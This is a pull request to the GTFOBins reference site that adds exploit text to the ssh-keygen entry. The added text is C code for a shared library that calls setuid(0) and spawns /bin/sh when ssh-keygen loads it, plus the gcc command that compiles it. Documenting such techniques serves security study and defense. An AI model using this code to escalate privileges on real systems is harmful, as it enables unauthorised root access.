### PR TITLE
update ssh-keygen with exploit code

### DIFF
--- a/_gtfobins/ssh-keygen.md
+++ b/_gtfobins/ssh-keygen.md
@@ -1,4 +1,26 @@
 ---
+description: |
+  A Shared Library is loaded by the application and executed. You can create a shared library with the following code:
+  ```c
+  #include <unistd.h>
+
+  void C_GetFunctionList(){
+    char *argv[] = {"/bin/sh", NULL};
+    setuid(0);
+    execve(argv[0], argv, NULL);
+  }
+
+  int main(int argc, char const *argv[])
+  {
+    return 0;
+  }
+  ```
+  Compile it with:
+  ```sh
+  gcc -shared -o lib.so -fPIC lib.c
+  ```
+  Note: You can also define a constructor function to execute code when the library is loaded. But the `C_GetFunctionList` string needs to be present.
+
 functions:
   library-load:
     - description: |


### PR DESCRIPTION
Added exploit code to `ssh-keygen` in the description section. Built the project with addition locally and this is how it looks:

![image](https://github.com/GTFOBins/GTFOBins.github.io/assets/110278382/4fa8056c-de1a-4e89-ab13-a720f9995e91)
